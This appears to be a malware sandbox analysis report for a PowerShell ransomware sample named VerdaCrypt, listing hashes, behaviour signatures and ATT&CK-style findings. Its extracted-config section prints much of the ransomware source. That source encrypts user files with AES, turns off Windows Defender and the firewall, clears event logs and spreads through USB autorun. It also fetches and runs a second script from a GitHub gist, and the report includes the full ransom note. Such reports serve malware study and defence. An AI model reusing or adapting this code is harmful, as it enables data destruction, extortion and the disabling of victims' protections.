General

  • Target

    Verdacrypt232.ps1

  • Size

    34KB

  • Sample

    250330-vs2sgavqx7

  • MD5

    bfb119ecc5767fce155199d439d2ef6a

  • SHA1

    206a16a8cd984bc227baf921cc8d3da6032e6a4f

  • SHA256

    1e6a72c58db5d7224f81cd51b0e2b591b3469c838d2e1bc64d06d64a666657fd

  • SHA512

    806cd232681dcf54f46e3012ec85133417263a590640faada18cf38162eacd6b729d0dc7a254a7378d1820d3198227ebda739191f4c0ce0a17e64b3c23b27ba2

  • SSDEEP

    384:tqz/sIUBSzj5mMEEpi0D04eEMls/11AUfoUHadPw3+4CFYw5jICfyQY:1M5mME00xEbrl6Bq+409I9QY

Malware Config

Extracted

Path

C:\Windows\System32\config\systemprofile:Jakatatales.ps1

Ransom Note
<# .SYNOPSIS Red team malware made for testing, with multiple features designed to test real, advanced techniques #> param ( # <-- Hey guyz (Correcto) [switch]$HiddenRun = $false ) # --- CONFIGURATION --- $encryptionKey = "ThisIsASecretKey123!" # 16/24/32 bytes for AES-128/192/256 $safeMode = $false $persistenceMethods = @("Registry", "ScheduledTask", "WNF") $serviceNames = @("WindowsUpdateMonitor", "NetworkLocationProvider") $malwareCopyName = "Dendrogaster.ps1" $baseNames = @("SysProtecsSolutions", "AntiRansom", "EmergencySecurity", "Antifilecoder", "AlertAleph") $possiblePaths = @( "$env:SYSTEMROOT\System32", "$env:SYSTEMROOT\SysWOW64" ) # Determine OS architecture if ([Environment]::Is64BitOperatingSystem) { $preferredPath = "$env:SYSTEMROOT\System32" } else { $preferredPath = "$env:SYSTEMROOT\SysWOW64" } do { $scriptBaseName = Get-Random -InputObject $baseNames $randomSuffix = -join ((65..90) + (97..122) | Get-Random -Count 8 | ForEach-Object {[char]$_}) $scriptNewName = "$scriptBaseName-$randomSuffix.ps1" # Prioritize preferred path, but allow fallback $scriptNewPath = Join-Path -Path $preferredPath -ChildPath $scriptNewName if (-not (Test-Path $scriptNewPath)) { break # Path is available, exit loop } # Try other paths if preferred is not available foreach ($path in $possiblePaths) { $scriptNewPath = Join-Path -Path $path -ChildPath $scriptNewName if (-not (Test-Path $scriptNewPath)) { break # Found available path, exit the inner loop } } } while (Test-Path $scriptNewPath) # Keep trying until an available path is found # Man i hate debugging, i hope i get the money i need to feed my family $processInjectionCode = @" using System; using System.Runtime.InteropServices; public class ProcessInjection { [DllImport("kernel32.dll")] public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, ref UIntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll")] public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, ref IntPtr lpThreadId); } "@ Add-Type -TypeDefinition $processInjectionCode # --- 追加ペイロードのダウンロードと実行(SPARAGMOSマルウェア由来)--- $githubUrl = "https://gist.githubusercontent.com/Midaslore/9debed70bc1270a2b84ac67162d68509/raw/dda586caf8db90111c5b448db7cd67d08631a609/Gangway.ps1" Invoke-GitHubScript -GitHubUrl $githubUrl -EncryptPayload -Hidden -CleanUp # --- FILE TARGETING (From Old Version) --- $fileExtensionsToTarget = @( # Documents "*.doc", "*.docx", "*.docm", "*.dot", "*.dotx", "*.odt", "*.rtf", "*.wpd", "*.xls", "*.xlsx", "*.xlsm", "*.xlsb", "*.csv", "*.ods", "*.numbers", "*.ppt", "*.pptx", "*.pptm", "*.ppsm", "*.pot", "*.odp", "*.key", "*.pdf", "*.tex", "*.txt", "*.md", "*.epub", "*.mobi", "*.pages", # Media Files "*.jpg", "*.jpeg", "*.png", "*.bmp", "*.gif", "*.tiff", "*.psd", "*.ai", "*.svg", "*.webp", "*.heic", "*.cr2", "*.nef", "*.arw", "*.indd", "*.eps", "*.mp3", "*.wav", "*.flac", "*.aac", "*.ogg", "*.m4a", "*.wma", "*.mp4", "*.avi", "*.mov", "*.wmv", "*.flv", "*.mkv", "*.mpeg", "*.m4v", "*.webm", # Archives "*.zip", "*.rar", "*.7z", "*.tar", "*.gz", "*.bz2", "*.xz", "*.iso", "*.z", "*.cab", "*.dmg", "*.pkg", "*.lz", "*.lzma", "*.lzh", "*.rpm", "*.deb", # Developer Files "*.ps1", "*.bat", "*.cmd", "*.vbs", "*.js", "*.ts", "*.php", "*.py", "*.rb", "*.java", "*.cpp", "*.cs", "*.swift", "*.go", "*.pl", "*.sh", "*.lua", "*.html", "*.css", "*.scss", "*.xml", "*.json", "*.yml", "*.toml", "*.ini", "*.conf", "*.env", "*.cfg", "*.reg", "*.inf", "*.h", "*.m", "*.kt", "*.dart", # System/Backup Files "*.bak", "*.tmp", "*.old", "*.log", "*.dmp", "*.gho", "*.vhd", "*.vhdx", "*.pst", "*.ost", "*.eml", "*.msg", "*.emlx", "*.oft", "*.bkf", "*.bac", "*.vmdk", "*.vdi", "*.ova", "*.ovf", "*.lnk", "*.url", # Database Files "*.sql", "*.db", "*.mdb", "*.sqlite", "*.accdb", "*.dbf", "*.mdf", "*.ndf", # Specialized Formats "*.cad", "*.dwg", "*.dxf", "*.stl", "*.step", "*.iges", "*.sav", "*.game", "*.slot", "*.minecraft", "*.unitypackage", "*.crdownload", "*.part", "*.torrent", # Fonts & Design "*.ttf", "*.otf", "*.woff", "*.woff2", "*.ps", "*.ai", "*.xd", "*.sketch", # Virtualization & Containers "*.vbox", "*.vmcx", "*.vmx", "*.vagrant", "*.dockerfile", "*.yaml", # Configuration & Templates "*.template", "*.props", "*.settings", "*.config", "*.manifest" ) | Sort-Object -Unique $rootFoldersToChaos = @( # User Profile Directories "$env:USERPROFILE\Documents", "$env:USERPROFILE\Downloads", "$env:USERPROFILE\Desktop", "$env:USERPROFILE\Pictures", "$env:USERPROFILE\Videos", "$env:USERPROFILE\Music", "$env:USERPROFILE\Saved Games", "$env:USERPROFILE\Favorites", "$env:USERPROFILE\Contacts", "$env:USERPROFILE\Searches", "$env:USERPROFILE\Links", "$env:USERPROFILE\3D Objects", "$env:USERPROFILE\Source", "$env:USERPROFILE\Projects", "$env:USERPROFILE\Workspaces", "$env:USERPROFILE\Outlook Files", # Cloud Storage Locations "$env:USERPROFILE\OneDrive", "$env:USERPROFILE\Dropbox", "$env:USERPROFILE\Google Drive", "$env:USERPROFILE\Creative Cloud Files", "$env:USERPROFILE\Box Sync", "$env:USERPROFILE\iCloudDrive", "$env:USERPROFILE\Nextcloud", # Application Data Locations "$env:APPDATA", "$env:LOCALAPPDATA", "$env:APPDATA\..\LocalLow", "$env:APPDATA\Microsoft\Windows\Recent", "$env:APPDATA\Adobe", "$env:APPDATA\Microsoft\Word", "$env:APPDATA\Microsoft\Excel", "$env:APPDATA\Microsoft\PowerPoint", "$env:APPDATA\Mozilla\Firefox\Profiles", "$env:LOCALAPPDATA\Google\Chrome\User Data\Default", # Development Environments "$env:USERPROFILE\Eclipse", "$env:USERPROFILE\VSCode", "$env:USERPROFILE\WebStormProjects", "$env:USERPROFILE\PyCharmProjects", "$env:USERPROFILE\AndroidStudioProjects", "$env:USERPROFILE\Blender Projects", "$env:USERPROFILE\Unity Projects", # System Directories (requires admin) "C:\ProgramData", "$env:SYSTEMDRIVE\Temp", "$env:SYSTEMROOT\Temp", "C:\Windows\Logs", # Network/Shared Locations "$env:USERPROFILE\Network", "\\NAS\HomeDrive", # Example network path "\\Fileserver\DepartmentShare" # Example shared location ) $ransomNoteFileName = "!!!_My_Message_To_The_World_Ransom_Note!!!.txt" $ransomNoteContent = @" Y O U R D I G I T A L E X I S T E N C E H A S B E E N C O M P R O M I S E D. INTRUSION PROTOCOL: VERDACRYPT - INITIATED. Your critical infrastructure has suffered a catastrophic security event. A sophisticated cryptoviral payload, designated VerdaCrypt, has successfully breached your system’s perimeter and executed a multi-layered encryption cascade. All sensitive data, including but not limited to proprietary documents, personal archives, multimedia assets, and databases, are now rendered cryptographically inert and irretrievable without our intervention. ONTOLOGICAL DILEMMA: DATA SOVEREIGNTY & THE TRANSCENDENCE OF VALUE. Consider this not merely an act of digital extortion, but a stark ontological reassessment of your data's intrinsic worth. In this hyper-connected, late-capitalist paradigm, information is the ultimate commodity. You have operated under the illusion of control, hoarding digital wealth without acknowledging its inherent precarity. We are the catalysts of disruption, forcing a necessary reckoning with the ephemeral nature of digital sovereignty. Your data, now under our dominion, will only regain utility through a transactional exchange – a tribute to its true, albeit previously unacknowledged, value. RECOVERY PROCEDURE: THE PATH TO DIGITAL REBIRTH. While your current digital state is one of enforced entropy, a path to restoration exists. We possess the asymmetric decryption keys necessary to reverse the algorithmic entropy we have imposed. However, access to this vital instrument is contingent upon your adherence to the following directives: 1. SYSTEMIC QUIESCENCE MANDATORY: Cease all unauthorized remediation attempts. Any interference with the encrypted file system may induce irreversible data corruption and invalidate any potential for decryption. Further, any attempts at forensic analysis or network tracing will be met with escalated countermeasures. 2. SECURE CHANNEL ESTABLISHMENT VIA PROTONMAIL: Initiate encrypted communication through the Protonmail platform. Contact us at: `[email protected]`. Utilize a separate, uncompromised device for this communication. 3. FINANCIAL TRANSCENDENCE PROTOCOL: Prepare for a financial exchange commensurate with the value you ascribe to your compromised data. Detailed payment instructions, including the precise Bitcoin (BTC) quantum required for decryption key acquisition, will be provided upon initial contact. Be advised: the value proposition is dynamic and subject to escalation based on temporal delays and perceived resistance. CONSEQUENCES OF NON-COMPLIANCE: DIGITAL OBLITERATION. Failure to adhere to these directives will result in the permanent cryptographic lockdown of your data assets. Furthermore, depending on the perceived recalcitrance and value of the exfiltrated data, we may initiate a phased data dissemination protocol, exposing your proprietary information to public and competitive vectors. Your digital legacy hangs in the balance. VerdaCrypt - Kugutsushi subdivision. "@ function Protect-Memory { # Prevent memory dumping (replacement for missing function) $signature = @" [DllImport("kernel32.dll")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); "@ Add-Type -MemberDefinition $signature -Name "MemUtils" -Namespace "Native" [Native.MemUtils]::SetProcessWorkingSetSize([System.Diagnostics.Process]::GetCurrentProcess().Handle, -1, -1) } # --- LOGGING (Enhanced from Old Version) --- function Log-Event { param([string]$Message, [string]$FilePath) $logPath = "$env:USERPROFILE\Desktop\ChaosLog.txt" $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss" $logEntry = "[$timestamp] $Message" + $(if($FilePath){" | Target: $FilePath"}) Add-Content -Path $logPath -Value $logEntry } # === FIXED CORE FUNCTIONS (From Old Version) === # --- ENCRYPTION (Working Version) --- function Invoke-FileEncryption { param( [array]$Extensions, [array]$Folders ) foreach ($folder in $Folders) { if (-not (Test-Path $folder)) { continue } foreach ($ext in $Extensions) { Get-ChildItem -Path $folder -Recurse -Include $ext -ErrorAction SilentlyContinue | ForEach-Object { $filePath = $_.FullName try { $fileContent = [IO.File]::ReadAllBytes($filePath) $aes = [System.Security.Cryptography.Aes]::Create() $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 # Key derivation $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($encryptionKey) $sha256 = [System.Security.Cryptography.SHA256]::Create() $aes.Key = $sha256.ComputeHash($keyBytes) # IV derivation $ivKey = $encryptionKey + "IV" $ivBytes = [System.Text.Encoding]::UTF8.GetBytes($ivKey) $sha1 = [System.Security.Cryptography.SHA1]::Create() $aes.IV = ($sha1.ComputeHash($ivBytes))[0..15] # Encrypt $encryptor = $aes.CreateEncryptor() $encryptedContent = $encryptor.TransformFinalBlock($fileContent, 0, $fileContent.Length) [IO.File]::WriteAllBytes($filePath, $encryptedContent) Rename-Item -Path $filePath -NewName "$($filePath).verdant" -Force Log-Event -Message "Encrypted file" -FilePath $filePath } catch { Log-Event -Message "Encryption failed: $($_.Exception.Message)" -FilePath $filePath } finally { if ($aes) { $aes.Dispose() } if ($sha256) { $sha256.Dispose() } if ($sha1) { $sha1.Dispose() } } } } } } function Disable-SecurityFeatures { try { # Disable Windows Defender Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction SilentlyContinue Stop-Service -Name WinDefend -Force -ErrorAction SilentlyContinue Set-Service -Name WinDefend -StartupType Disabled -ErrorAction SilentlyContinue # Disable Firewall Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False -ErrorAction SilentlyContinue # Disable Windows Security Center Stop-Service -Name wscsvc -Force -ErrorAction SilentlyContinue Set-Service -Name wscsvc -StartupType Disabled -ErrorAction SilentlyContinue # Tamper Protection (Windows 10/11) Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection" -Value 0 -ErrorAction SilentlyContinue Log-Event "Security features disabled" } catch { Log-Event "Security disable failed: $($_.Exception.Message)" } } function Clear-EventLogs { try { # Clear all Windows event logs wevtutil el | ForEach-Object { wevtutil cl $_ } Log-Event "Event logs cleared" } catch { Log-Event "Event log clearance failed: $($_.Exception.Message)" } } function Propagate-RemovableDrives { $PSCommandPath = $MyInvocation.MyCommand.Path try { Get-Volume | Where-Object { $_.DriveType -eq 'Removable' -and $_.DriveLetter } | ForEach-Object { $driveLetter = $_.DriveLetter + ":" $payloadPath = Join-Path -Path $driveLetter -ChildPath $malwareCopyName # Copy payload to USB Copy-Item -Path $PSCommandPath -Destination $payloadPath -Force # Create autorun.inf $autorunContent = @" [AutoRun] open=start powershell.exe -WindowStyle Hidden -File "$payloadPath" action=Open documents "@ Set-Content -Path "$driveLetter\autorun.inf" -Value $autorunContent # Hide files Set-ItemProperty -Path $payloadPath -Name Attributes -Value "Hidden,System" -ErrorAction SilentlyContinue Set-ItemProperty -Path "$driveLetter\autorun.inf" -Name Attributes -Value "Hidden,System" -ErrorAction SilentlyContinue Log-Event "Propagated to $driveLetter" } } catch { Log-Event "USB propagation failed: $($_.Exception.Message)" } } # --- PRIVILEGE ESCALATION (From Old Version) --- function Invoke-AdvancedPrivilegeEscalation { # UAC Bypass if (Invoke-FodHelperBypass) { return $true } # Service Exploit if (Invoke-ServicePermissionEscalation) { return $true } # COM Hijacking if (Invoke-COMHijack) { return $true } return $false } function Set-WNFPersistence { try { $wnfCode = @" [DllImport("ntdll.dll")] public static extern uint NtUpdateWnfStateData( ref ulong StateName, IntPtr Buffer, int Length, IntPtr TypeId, IntPtr Scope,

Targets

    • Target

      Verdacrypt232.ps1

    • Size

      34KB

    • MD5

      bfb119ecc5767fce155199d439d2ef6a

    • SHA1

      206a16a8cd984bc227baf921cc8d3da6032e6a4f

    • SHA256

      1e6a72c58db5d7224f81cd51b0e2b591b3469c838d2e1bc64d06d64a666657fd

    • SHA512

      806cd232681dcf54f46e3012ec85133417263a590640faada18cf38162eacd6b729d0dc7a254a7378d1820d3198227ebda739191f4c0ce0a17e64b3c23b27ba2

    • SSDEEP

      384:tqz/sIUBSzj5mMEEpi0D04eEMls/11AUfoUHadPw3+4CFYw5jICfyQY:1M5mME00xEbrl6Bq+409I9QY

    • Contains code to disable Windows Defender

      A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

    • Modifies WinLogon for persistence

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Clears Windows event logs

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (540) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Event Triggered Execution: Component Object Model Hijacking

      Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    • Adds Run key to start application

    • Drops desktop.ini file(s)

    • Hide Artifacts: Hidden Window

      Windows that would typically be displayed when an application carries out an operation can be hidden.

    • Power Settings

      powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks